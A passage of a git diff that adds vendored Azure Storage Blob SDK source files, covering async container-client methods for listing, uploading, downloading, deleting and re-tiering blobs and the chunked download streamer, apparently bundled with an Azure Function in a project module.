+ When the request includes this parameter, the operation returns a BlobPrefix
+ element in the response body that acts as a placeholder for all blobs whose
+ names begin with the same substring up to the appearance of the delimiter
+ character. The delimiter may be a single character or a string.
+ :keyword int timeout:
+ The timeout parameter is expressed in seconds.
+ :returns: An iterable (auto-paging) response of BlobProperties.
+ :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.storage.blob.BlobProperties]
+ """
+ if include and not isinstance(include, list):
+ include = [include]
+
+ results_per_page = kwargs.pop('results_per_page', None)
+ timeout = kwargs.pop('timeout', None)
+ command = functools.partial(
+ self._client.container.list_blob_hierarchy_segment,
+ delimiter=delimiter,
+ include=include,
+ timeout=timeout,
+ **kwargs)
+ return BlobPrefix(
+ command,
+ prefix=name_starts_with,
+ results_per_page=results_per_page,
+ delimiter=delimiter)
+
+ @distributed_trace
+ def find_blobs_by_tags(
+ self, filter_expression, # type: str
+ **kwargs # type: Optional[Any]
+ ):
+ # type: (...) -> AsyncItemPaged[FilteredBlob]
+ """Returns a generator to list the blobs under the specified container whose tags
+ match the given search expression.
+ The generator will lazily follow the continuation tokens returned by
+ the service.
+
+ :param str filter_expression:
+ The expression to find blobs whose tags match the specified condition.
+ e.g. "\"yourtagname\"='firsttag' and \"yourtagname2\"='secondtag'"
+ :keyword int results_per_page:
+ The maximum number of results per page when paginating.
+ :keyword int timeout:
+ The timeout parameter is expressed in seconds.
+ :returns: An iterable (auto-paging) response of FilteredBlob.
+ :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.storage.blob.FilteredBlob]
+ """
+ results_per_page = kwargs.pop('results_per_page', None)
+ timeout = kwargs.pop('timeout', None)
+ command = functools.partial(
+ self._client.container.filter_blobs,
+ timeout=timeout,
+ where=filter_expression,
+ **kwargs)
+ return AsyncItemPaged(
+ command, results_per_page=results_per_page,
+ page_iterator_class=FilteredBlobPaged)
+
+ @distributed_trace_async
+ async def upload_blob(
+ self, name, # type: Union[str, BlobProperties]
+ data, # type: Union[Iterable[AnyStr], IO[AnyStr]]
+ blob_type=BlobType.BlockBlob, # type: Union[str, BlobType]
+ length=None, # type: Optional[int]
+ metadata=None, # type: Optional[Dict[str, str]]
+ **kwargs
+ ):
+ # type: (...) -> BlobClient
+ """Creates a new blob from a data source with automatic chunking.
+
+ :param name: The blob with which to interact. If specified, this value will override
+ a blob value specified in the blob URL.
+ :type name: str or ~azure.storage.blob.BlobProperties
+ :param data: The blob data to upload.
+ :param ~azure.storage.blob.BlobType blob_type: The type of the blob. This can be
+ either BlockBlob, PageBlob or AppendBlob. The default value is BlockBlob.
+ :param int length:
+ Number of bytes to read from the stream. This is optional, but
+ should be supplied for optimal performance.
+ :param metadata:
+ Name-value pairs associated with the blob as metadata.
+ :type metadata: dict(str, str)
+ :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data.
+ If True, upload_blob will overwrite the existing data. If set to False, the
+ operation will fail with ResourceExistsError.
The exception to the above is with Append
+ blob types: if set to False and the data already exists, an error will not be raised
+ and the data will be appended to the existing blob. If overwrite is set to True, the existing
+ append blob will be deleted, and a new one created. Defaults to False.
+ :keyword ~azure.storage.blob.ContentSettings content_settings:
+ ContentSettings object used to set blob properties. Used to set content type, encoding,
+ language, disposition, md5, and cache control.
+ :keyword bool validate_content:
+ If true, calculates an MD5 hash for each chunk of the blob. The storage
+ service checks the hash of the content that has arrived with the hash
+ that was sent. This is primarily valuable for detecting bitflips on
+ the wire if using http instead of https, as https (the default) will
+ already validate. Note that this MD5 hash is not stored with the
+ blob. Also note that if enabled, the memory-efficient upload algorithm
+ will not be used, because computing the MD5 hash requires buffering
+ entire blocks, and doing so defeats the purpose of the memory-efficient algorithm.
+ :keyword lease:
+ Required if the container has an active lease. Value can be a BlobLeaseClient object
+ or the lease ID as a string.
+ :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str
+ :keyword ~datetime.datetime if_modified_since:
+ A DateTime value. Azure expects the date value passed in to be UTC.
+ If timezone is included, any non-UTC datetimes will be converted to UTC.
+ If a date is passed in without timezone info, it is assumed to be UTC.
+ Specify this header to perform the operation only
+ if the resource has been modified since the specified time.
+ :keyword ~datetime.datetime if_unmodified_since:
+ A DateTime value. Azure expects the date value passed in to be UTC.
+ If timezone is included, any non-UTC datetimes will be converted to UTC.
+ If a date is passed in without timezone info, it is assumed to be UTC.
+ Specify this header to perform the operation only if
+ the resource has not been modified since the specified date/time.
+ :keyword str etag:
+ An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+ and act according to the condition specified by the `match_condition` parameter.
+ :keyword ~azure.core.MatchConditions match_condition:
+ The match condition to use upon the etag.
+ :keyword str if_tags_match_condition:
+ Specify a SQL where clause on blob tags to operate only on blobs with a matching value.
+ e.g. ``\"\\\"tagname\\\"='my tag'\"``
+
+ .. versionadded:: 12.4.0
+
+ :keyword int timeout:
+ The timeout parameter is expressed in seconds. This method may make
+ multiple calls to the Azure service and the timeout will apply to
+ each call individually.
+ :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier:
+ A page blob tier value to set the blob to. The tier correlates to the size of the
+ blob and number of allowed IOPS. This is only applicable to page blobs on
+ premium storage accounts.
+ :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier:
+ A standard blob tier value to set the blob to. For this version of the library,
+ this is only applicable to block blobs on standard storage accounts.
+ :keyword int maxsize_condition:
+ Optional conditional header. The max length in bytes permitted for
+ the append blob.
If the Append Block operation would cause the blob
+ to exceed that limit or if the blob size is already greater than the
+ value specified in this header, the request will fail with
+ MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed).
+ :keyword int max_concurrency:
+ Maximum number of parallel connections to use when the blob size exceeds
+ 64MB.
+ :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk:
+ Encrypts the data on the service-side with the given key.
+ Use of customer-provided keys must be done over HTTPS.
+ As the encryption key itself is provided in the request,
+ a secure connection must be established to transfer the key.
+ :keyword str encryption_scope:
+ A predefined encryption scope used to encrypt the data on the service. An encryption
+ scope can be created using the Management API and referenced here by name. If a default
+ encryption scope has been defined at the container, this value will override it if the
+ container-level scope is configured to allow overrides. Otherwise an error will be raised.
+
+ .. versionadded:: 12.2.0
+
+ :keyword str encoding:
+ Defaults to UTF-8.
+ :keyword progress_hook:
+ An async callback to track the progress of a long running upload. The signature is
+ function(current: int, total: Optional[int]) where current is the number of bytes transferred
+ so far, and total is the size of the blob or None if the size is unknown.
+ :paramtype progress_hook: Callable[[int, Optional[int]], Awaitable[None]]
+ :returns: A BlobClient to interact with the newly uploaded blob.
+ :rtype: ~azure.storage.blob.aio.BlobClient
+
+ .. admonition:: Example:
+
+ .. literalinclude:: ../samples/blob_samples_containers_async.py
+ :start-after: [START upload_blob_to_container]
+ :end-before: [END upload_blob_to_container]
+ :language: python
+ :dedent: 12
+ :caption: Upload blob to the container.
+ """
+ blob = self.get_blob_client(name)
+ kwargs.setdefault('merge_span', True)
+ timeout = kwargs.pop('timeout', None)
+ encoding = kwargs.pop('encoding', 'UTF-8')
+ await blob.upload_blob(
+ data,
+ blob_type=blob_type,
+ length=length,
+ metadata=metadata,
+ timeout=timeout,
+ encoding=encoding,
+ **kwargs
+ )
+ return blob
+
+ @distributed_trace_async
+ async def delete_blob(
+ self, blob, # type: Union[str, BlobProperties]
+ delete_snapshots=None, # type: Optional[str]
+ **kwargs
+ ):
+ # type: (...) -> None
+ """Marks the specified blob or snapshot for deletion.
+
+ The blob is later deleted during garbage collection.
+ Note that in order to delete a blob, you must delete all of its
+ snapshots. You can delete both at the same time with the delete_blob
+ operation.
+
+ If a delete retention policy is enabled for the service, then this operation soft deletes the blob or snapshot
+ and retains the blob or snapshot for the specified number of days.
+ After the specified number of days, the blob's data is removed from the service during garbage collection.
+ A soft-deleted blob or snapshot is accessible through :func:`list_blobs()` by specifying the
+ `include=["deleted"]` option. A soft-deleted blob or snapshot can be restored using
+ :func:`~BlobClient.undelete()`.
+
+ :param blob: The blob with which to interact. If specified, this value will override
+ a blob value specified in the blob URL.
+ :type blob: str or ~azure.storage.blob.BlobProperties
+ :param str delete_snapshots:
+ Required if the blob has associated snapshots. Values include:
+ - "only": Deletes only the blob's snapshots.
+ - "include": Deletes the blob along with all snapshots.
+ :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to delete. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword lease: + Required if the blob has an active lease. Value can be a Lease object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + blob = self.get_blob_client(blob) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + await blob.delete_blob( # type: ignore + delete_snapshots=delete_snapshots, + timeout=timeout, + **kwargs) + + @distributed_trace_async + async def download_blob(self, blob, offset=None, length=None, **kwargs): + # type: (Union[str, BlobProperties], Optional[int], Optional[int], Any) -> StorageStreamDownloader + """Downloads a blob to the StorageStreamDownloader. The readall() method must + be used to read all the content or readinto() must be used to download the blob into + a stream. Using chunks() returns an async iterator which allows the user to iterate over the content in chunks. + + :param blob: The blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type blob: str or ~azure.storage.blob.BlobProperties + :param int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to download. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. 
This is primarily valuable for detecting bitflips on
+ the wire if using http instead of https, as https (the default) will
+ already validate. Note that this MD5 hash is not stored with the
+ blob. Also note that if enabled, the memory-efficient download algorithm
+ will not be used because computing the MD5 hash requires buffering
+ entire blocks, and doing so defeats the purpose of the memory-efficient algorithm.
+ :keyword lease:
+ Required if the blob has an active lease. If specified, download_blob only
+ succeeds if the blob's lease is active and matches this ID. Value can be a
+ BlobLeaseClient object or the lease ID as a string.
+ :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str
+ :keyword ~datetime.datetime if_modified_since:
+ A DateTime value. Azure expects the date value passed in to be UTC.
+ If timezone is included, any non-UTC datetimes will be converted to UTC.
+ If a date is passed in without timezone info, it is assumed to be UTC.
+ Specify this header to perform the operation only
+ if the resource has been modified since the specified time.
+ :keyword ~datetime.datetime if_unmodified_since:
+ A DateTime value. Azure expects the date value passed in to be UTC.
+ If timezone is included, any non-UTC datetimes will be converted to UTC.
+ If a date is passed in without timezone info, it is assumed to be UTC.
+ Specify this header to perform the operation only if
+ the resource has not been modified since the specified date/time.
+ :keyword str etag:
+ An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+ and act according to the condition specified by the `match_condition` parameter.
+ :keyword ~azure.core.MatchConditions match_condition:
+ The match condition to use upon the etag.
+ :keyword str if_tags_match_condition:
+ Specify a SQL where clause on blob tags to operate only on blobs with a matching value.
+ e.g. ``\"\\\"tagname\\\"='my tag'\"``
+
+ .. versionadded:: 12.4.0
+
+ :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk:
+ Encrypts the data on the service-side with the given key.
+ Use of customer-provided keys must be done over HTTPS.
+ As the encryption key itself is provided in the request,
+ a secure connection must be established to transfer the key.
+ :keyword int max_concurrency:
+ The number of parallel connections with which to download.
+ :keyword str encoding:
+ Encoding to decode the downloaded bytes. Default is None, i.e. no decoding.
+ :keyword progress_hook:
+ An async callback to track the progress of a long running download. The signature is
+ function(current: int, total: int) where current is the number of bytes transferred
+ so far, and total is the total size of the download.
+ :paramtype progress_hook: Callable[[int, int], Awaitable[None]]
+ :keyword int timeout:
+ The timeout parameter is expressed in seconds. This method may make
+ multiple calls to the Azure service and the timeout will apply to
+ each call individually.
+ :returns: A streaming object (StorageStreamDownloader).
+ :rtype: ~azure.storage.blob.aio.StorageStreamDownloader
+ """
+ blob_client = self.get_blob_client(blob) # type: ignore
+ kwargs.setdefault('merge_span', True)
+ return await blob_client.download_blob(
+ offset=offset,
+ length=length,
+ **kwargs)
+
+ @distributed_trace_async
+ async def delete_blobs( # pylint: disable=arguments-differ
+ self, *blobs: List[Union[str, BlobProperties, dict]],
+ **kwargs
+ ) -> AsyncIterator[AsyncHttpResponse]:
+ """Marks the specified blobs or snapshots for deletion.
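+
+ A minimal batch-delete sketch (blob names are hypothetical; see the notes
+ below for per-blob options):
+
+ .. code-block:: python
+
+     # Deletes up to 256 blobs in a single batch request.
+     await container_client.delete_blobs("logs/day1.txt", "logs/day2.txt")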
+
+ The blobs are later deleted during garbage collection.
+ Note that in order to delete blobs, you must delete all of their
+ snapshots. You can delete both at the same time with the delete_blobs operation.
+
+ If a delete retention policy is enabled for the service, then this operation soft deletes the blobs or snapshots
+ and retains the blobs or snapshots for the specified number of days.
+ After the specified number of days, the blobs' data is removed from the service during garbage collection.
+ Soft-deleted blobs or snapshots are accessible through :func:`list_blobs()` by specifying the
+ `include=["deleted"]` option. Soft-deleted blobs or snapshots can be restored using
+ :func:`~BlobClient.undelete()`.
+
+ The maximum number of blobs that can be deleted in a single request is 256.
+
+ :param blobs:
+ The blobs to delete. This can be a single blob, or multiple values can
+ be supplied, where each value is either the name of the blob (str) or BlobProperties.
+
+ .. note::
+ When the blob type is dict, here is a list of keys and value rules.
+
+ blob name:
+ key: 'name', value type: str
+ snapshot you want to delete:
+ key: 'snapshot', value type: str
+ whether to delete snapshots when deleting the blob:
+ key: 'delete_snapshots', value: 'include' or 'only'
+ whether the blob has been modified or not:
+ key: 'if_modified_since', 'if_unmodified_since', value type: datetime
+ etag:
+ key: 'etag', value type: str
+ whether to match the etag or not:
+ key: 'match_condition', value type: MatchConditions
+ tags match condition:
+ key: 'if_tags_match_condition', value type: str
+ lease:
+ key: 'lease_id', value type: Union[str, LeaseClient]
+ timeout for subrequest:
+ key: 'timeout', value type: int
+
+ :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties]
+ :keyword str delete_snapshots:
+ Required if a blob has associated snapshots. Values include:
+ - "only": Deletes only the blob's snapshots.
+ - "include": Deletes the blob along with all snapshots.
+ :keyword ~datetime.datetime if_modified_since:
+ A DateTime value. Azure expects the date value passed in to be UTC.
+ If timezone is included, any non-UTC datetimes will be converted to UTC.
+ If a date is passed in without timezone info, it is assumed to be UTC.
+ Specify this header to perform the operation only
+ if the resource has been modified since the specified time.
+ :keyword ~datetime.datetime if_unmodified_since:
+ A DateTime value. Azure expects the date value passed in to be UTC.
+ If timezone is included, any non-UTC datetimes will be converted to UTC.
+ If a date is passed in without timezone info, it is assumed to be UTC.
+ Specify this header to perform the operation only if
+ the resource has not been modified since the specified date/time.
+ :keyword str if_tags_match_condition:
+ Specify a SQL where clause on blob tags to operate only on blobs with a matching value.
+ e.g. ``\"\\\"tagname\\\"='my tag'\"``
+
+ .. versionadded:: 12.4.0
+
+ :keyword bool raise_on_any_failure:
+ A boolean parameter that defaults to True. When this is set, an exception
+ is raised even if there is a single operation failure. For optimal performance,
+ this should be set to False.
+ :keyword int timeout:
+ The timeout parameter is expressed in seconds.
+ :return: An async iterator of responses, one for each blob in order.
+ :rtype: asynciterator[~azure.core.pipeline.transport.AsyncHttpResponse]
+
+ .. admonition:: Example:
+
+ .. literalinclude:: ../samples/blob_samples_common_async.py
+ :start-after: [START delete_multiple_blobs]
+ :end-before: [END delete_multiple_blobs]
+ :language: python
+ :dedent: 12
+ :caption: Deleting multiple blobs.
+ """
+ if len(blobs) == 0:
+ return iter(list())
+
+ reqs, options = self._generate_delete_blobs_options(*blobs, **kwargs)
+
+ return await self._batch_send(*reqs, **options)
+
+ @distributed_trace
+ async def set_standard_blob_tier_blobs(
+ self,
+ standard_blob_tier: Union[str, 'StandardBlobTier'],
+ *blobs: List[Union[str, BlobProperties, dict]],
+ **kwargs
+ ) -> AsyncIterator[AsyncHttpResponse]:
+ """This operation sets the tier on block blobs.
+
+ A block blob's tier determines Hot/Cool/Archive storage type.
+ This operation does not update the blob's ETag.
+
+ The maximum number of blobs that can be updated in a single request is 256.
+
+ :param standard_blob_tier:
+ Indicates the tier to be set on all blobs. Options include 'Hot', 'Cool',
+ 'Archive'. The hot tier is optimized for storing data that is accessed
+ frequently. The cool storage tier is optimized for storing data that
+ is infrequently accessed and stored for at least a month. The archive
+ tier is optimized for storing data that is rarely accessed and stored
+ for at least six months with flexible latency requirements.
+
+ .. note::
+ If you want to set a different tier on different blobs, please set this positional
+ parameter to None. Then the blob tier on every BlobProperties will be taken.
+
+ :type standard_blob_tier: str or ~azure.storage.blob.StandardBlobTier
+ :param blobs:
+ The blobs with which to interact. This can be a single blob, or multiple values can
+ be supplied, where each value is either the name of the blob (str) or BlobProperties.
+
+ .. note::
+ When the blob type is dict, here is a list of keys and value rules.
+ blob name:
+ key: 'name', value type: str
+ standard blob tier:
+ key: 'blob_tier', value type: StandardBlobTier
+ rehydrate priority:
+ key: 'rehydrate_priority', value type: RehydratePriority
+ lease:
+ key: 'lease_id', value type: Union[str, LeaseClient]
+ tags match condition:
+ key: 'if_tags_match_condition', value type: str
+ timeout for subrequest:
+ key: 'timeout', value type: int
+
+ :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties]
+ :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority:
+ Indicates the priority with which to rehydrate an archived blob.
+ :keyword str if_tags_match_condition:
+ Specify a SQL where clause on blob tags to operate only on blobs with a matching value.
+ e.g. ``\"\\\"tagname\\\"='my tag'\"``
+
+ .. versionadded:: 12.4.0
+
+ :keyword int timeout:
+ The timeout parameter is expressed in seconds.
+ :keyword bool raise_on_any_failure:
+ A boolean parameter that defaults to True. When this is set, an exception
+ is raised even if there is a single operation failure. For optimal performance,
+ this should be set to False.
+ :return: An async iterator of responses, one for each blob in order.
+ :rtype: asynciterator[~azure.core.pipeline.transport.AsyncHttpResponse]
+ """
+ reqs, options = self._generate_set_tiers_options(standard_blob_tier, *blobs, **kwargs)
+
+ return await self._batch_send(*reqs, **options)
+
+ @distributed_trace
+ async def set_premium_page_blob_tier_blobs(
+ self,
+ premium_page_blob_tier: Union[str, 'PremiumPageBlobTier'],
+ *blobs: List[Union[str, BlobProperties, dict]],
+ **kwargs
+ ) -> AsyncIterator[AsyncHttpResponse]:
+ """Sets the page blob tiers on the blobs.
This API is only supported for page blobs on premium accounts. + + The maximum number of blobs that can be updated in a single request is 256. + + :param premium_page_blob_tier: + A page blob tier value to set on all blobs. The tier correlates to the size of the + blob and the number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + + .. note:: + If you want to set a different tier on different blobs, set this positional parameter to None. + The blob tier on each BlobProperties will then be used. + + :type premium_page_blob_tier: ~azure.storage.blob.PremiumPageBlobTier + :param blobs: The blobs with which to interact. This can be a single blob, or multiple values can + be supplied, where each value is either the name of the blob (str) or BlobProperties. + + .. note:: + When the blob type is dict, here's a list of keys and value rules. + + blob name: + key: 'name', value type: str + premium blob tier: + key: 'blob_tier', value type: PremiumPageBlobTier + lease: + key: 'lease_id', value type: Union[str, LeaseClient] + timeout for subrequest: + key: 'timeout', value type: int + + :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :keyword bool raise_on_any_failure: + This is a boolean param which defaults to True. When this is set, an exception + is raised even if there is a single operation failure. For optimal performance, + this should be set to False. + :return: An async iterator of responses, one for each blob in order. + :rtype: asynciterator[~azure.core.pipeline.transport.AsyncHttpResponse] + """ + reqs, options = self._generate_set_tiers_options(premium_page_blob_tier, *blobs, **kwargs) + + return await self._batch_send(*reqs, **options) + + def get_blob_client( + self, blob, # type: Union[BlobProperties, str] + snapshot=None # type: str + ): + # type: (...) -> BlobClient + """Get a client to interact with the specified blob. + + The blob need not already exist. + + :param blob: + The blob with which to interact. + :type blob: str or ~azure.storage.blob.BlobProperties + :param str snapshot: + The optional blob snapshot on which to operate. This can be the snapshot ID string + or the response returned from :func:`~BlobClient.create_snapshot()`. + :returns: A BlobClient. + :rtype: ~azure.storage.blob.aio.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START get_blob_client] + :end-before: [END get_blob_client] + :language: python + :dedent: 12 + :caption: Get the blob client. 
+ """ + blob_name = _get_blob_name(blob) + _pipeline = AsyncPipeline( + transport=AsyncTransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return BlobClient( + self.url, container_name=self.container_name, blob_name=blob_name, snapshot=snapshot, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_download_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_download_async.py new file mode 100644 index 0000000..6248faa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_download_async.py @@ -0,0 +1,555 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=invalid-overridden-method + +import asyncio +import sys +from io import BytesIO +from itertools import islice +import warnings +from typing import AsyncIterator + +from aiohttp import ClientPayloadError +from azure.core.exceptions import HttpResponseError, ServiceResponseError +from .._shared.encryption import decrypt_blob +from .._shared.request_handlers import validate_and_format_range_headers +from .._shared.response_handlers import process_storage_error, parse_length_from_content_range +from .._deserialize import get_page_ranges_result +from .._download import process_range_and_offset, _ChunkDownloader + +async def process_content(data, start_offset, end_offset, encryption): + if data is None: + raise ValueError("Response cannot be None.") + content = data.response.body() + if encryption.get('key') is not None or encryption.get('resolver') is not None: + try: + return decrypt_blob( + encryption.get('required'), + encryption.get('key'), + encryption.get('resolver'), + content, + start_offset, + end_offset, + data.response.headers) + except Exception as error: + raise HttpResponseError( + message="Decryption failed.", + response=data.response, + error=error) + return content + + +class _AsyncChunkDownloader(_ChunkDownloader): + def __init__(self, **kwargs): + super(_AsyncChunkDownloader, self).__init__(**kwargs) + self.stream_lock = asyncio.Lock() if kwargs.get('parallel') else None + self.progress_lock = asyncio.Lock() if kwargs.get('parallel') else None + + async def process_chunk(self, chunk_start): + chunk_start, chunk_end = self._calculate_range(chunk_start) + chunk_data = await self._download_chunk(chunk_start, chunk_end - 1) + length = chunk_end - chunk_start + if length > 0: + await self._write_to_stream(chunk_data, chunk_start) + await self._update_progress(length) + + async def yield_chunk(self, chunk_start): + chunk_start, chunk_end = self._calculate_range(chunk_start) + return await self._download_chunk(chunk_start, chunk_end - 1) + + async def _update_progress(self, length): + if self.progress_lock: + async with 
self.progress_lock: # pylint: disable=not-async-context-manager + self.progress_total += length + else: + self.progress_total += length + + if self.progress_hook: + await self.progress_hook(self.progress_total, self.total_size) + + async def _write_to_stream(self, chunk_data, chunk_start): + if self.stream_lock: + async with self.stream_lock: # pylint: disable=not-async-context-manager + self.stream.seek(self.stream_start + (chunk_start - self.start_index)) + self.stream.write(chunk_data) + else: + self.stream.write(chunk_data) + + async def _download_chunk(self, chunk_start, chunk_end): + download_range, offset = process_range_and_offset( + chunk_start, chunk_end, chunk_end, self.encryption_options) + + # No need to download an empty chunk from the server if there's no data in the chunk to be downloaded. + # Instead, optimize by creating the empty chunk locally. + if self._do_optimize(download_range[0], download_range[1]): + chunk_data = b"\x00" * self.chunk_size + else: + range_header, range_validation = validate_and_format_range_headers( + download_range[0], + download_range[1], + check_content_md5=self.validate_content + ) + retry_active = True + retry_total = 3 + while retry_active: + try: + _, response = await self.client.download( + range=range_header, + range_get_content_md5=range_validation, + validate_content=self.validate_content, + data_stream_total=self.total_size, + download_stream_current=self.progress_total, + **self.request_options + ) + retry_active = False + + except HttpResponseError as error: + process_storage_error(error) + except ClientPayloadError as error: + retry_total -= 1 + if retry_total <= 0: + raise ServiceResponseError(error, error=error) + await asyncio.sleep(1) + + chunk_data = await process_content(response, offset[0], offset[1], self.encryption_options) + + + # This makes sure that if_match is set so that we can validate + # that subsequent downloads are to an unmodified blob + if self.request_options.get('modified_access_conditions'): + self.request_options['modified_access_conditions'].if_match = response.properties.etag + + return chunk_data + + + class _AsyncChunkIterator(object): + """Async iterator for chunks in blob download stream.""" + + def __init__(self, size, content, downloader, chunk_size): + self.size = size + self._chunk_size = chunk_size + self._current_content = content + self._iter_downloader = downloader + self._iter_chunks = None + self._complete = (size == 0) + + def __len__(self): + return self.size + + def __iter__(self): + raise TypeError("Async stream must be iterated asynchronously.") + + def __aiter__(self): + return self + + async def __anext__(self): + """Iterate through responses.""" + if self._complete: + raise StopAsyncIteration("Download complete") + if not self._iter_downloader: + # cut the data obtained from initial GET into chunks + if len(self._current_content) > self._chunk_size: + return self._get_chunk_data() + self._complete = True + return self._current_content + + if not self._iter_chunks: + self._iter_chunks = self._iter_downloader.get_chunk_offsets() + + # initial GET result still has more than _chunk_size bytes of data + if len(self._current_content) >= self._chunk_size: + return self._get_chunk_data() + + try: + chunk = next(self._iter_chunks) + self._current_content += await self._iter_downloader.yield_chunk(chunk) + except StopIteration: + self._complete = True + # it's likely that there is some data left in self._current_content + if self._current_content: + return self._current_content + raise 
StopAsyncIteration("Download complete") + + return self._get_chunk_data() + + def _get_chunk_data(self): + chunk_data = self._current_content[: self._chunk_size] + self._current_content = self._current_content[self._chunk_size:] + return chunk_data + + + class StorageStreamDownloader(object): # pylint: disable=too-many-instance-attributes + """A streaming object to download from Azure Storage. + + :ivar str name: + The name of the blob being downloaded. + :ivar str container: + The name of the container where the blob is. + :ivar ~azure.storage.blob.BlobProperties properties: + The properties of the blob being downloaded. If only a range of the data is being + downloaded, this will be reflected in the properties. + :ivar int size: + The size of the total data in the stream. This will be the byte range if specified, + otherwise the total size of the blob. + """ + + def __init__( + self, + clients=None, + config=None, + start_range=None, + end_range=None, + validate_content=None, + encryption_options=None, + max_concurrency=1, + name=None, + container=None, + encoding=None, + **kwargs + ): + self.name = name + self.container = container + self.properties = None + self.size = None + + self._clients = clients + self._config = config + self._start_range = start_range + self._end_range = end_range + self._max_concurrency = max_concurrency + self._encoding = encoding + self._validate_content = validate_content + self._encryption_options = encryption_options or {} + self._progress_hook = kwargs.pop('progress_hook', None) + self._request_options = kwargs + self._location_mode = None + self._download_complete = False + self._current_content = None + self._file_size = None + self._non_empty_ranges = None + self._response = None + + # The service only provides transactional MD5s for chunks under 4MB. + # If validate_content is on, get only self.MAX_CHUNK_GET_SIZE for the first + # chunk so a transactional MD5 can be retrieved. 
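+ # The initial request spans [start, start + first_get_size - 1], clamped + # to the caller's end_range when that whole range fits inside one first + # GET; process_range_and_offset then adjusts the range and offset when + # client-side encryption is in use.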
+ self._first_get_size = self._config.max_single_get_size if not self._validate_content \ + else self._config.max_chunk_get_size + initial_request_start = self._start_range if self._start_range is not None else 0 + if self._end_range is not None and self._end_range - self._start_range < self._first_get_size: + initial_request_end = self._end_range + else: + initial_request_end = initial_request_start + self._first_get_size - 1 + + self._initial_range, self._initial_offset = process_range_and_offset( + initial_request_start, initial_request_end, self._end_range, self._encryption_options + ) + + def __len__(self): + return self.size + + async def _setup(self): + self._response = await self._initial_request() + self.properties = self._response.properties + self.properties.name = self.name + self.properties.container = self.container + + # Set the content length to the download size instead of the size of + # the last range + self.properties.size = self.size + + # Overwrite the content range to the user requested range + self.properties.content_range = 'bytes {0}-{1}/{2}'.format( + self._start_range, + self._end_range, + self._file_size + ) + + # Overwrite the content MD5 as it is the MD5 for the last range instead + # of the stored MD5 + # TODO: Set to the stored MD5 when the service returns this + self.properties.content_md5 = None + + if self.size == 0: + self._current_content = b"" + else: + self._current_content = await process_content( + self._response, + self._initial_offset[0], + self._initial_offset[1], + self._encryption_options + ) + + async def _initial_request(self): + range_header, range_validation = validate_and_format_range_headers( + self._initial_range[0], + self._initial_range[1], + start_range_required=False, + end_range_required=False, + check_content_md5=self._validate_content) + + retry_active = True + retry_total = 3 + while retry_active: + try: + location_mode, response = await self._clients.blob.download( + range=range_header, + range_get_content_md5=range_validation, + validate_content=self._validate_content, + data_stream_total=None, + download_stream_current=0, + **self._request_options) + + # Check the location we read from to ensure we use the same one + # for subsequent requests. + self._location_mode = location_mode + + # Parse the total file size and adjust the download size if ranges + # were specified + self._file_size = parse_length_from_content_range(response.properties.content_range) + if self._end_range is not None: + # Use the length unless it is over the end of the file + self.size = 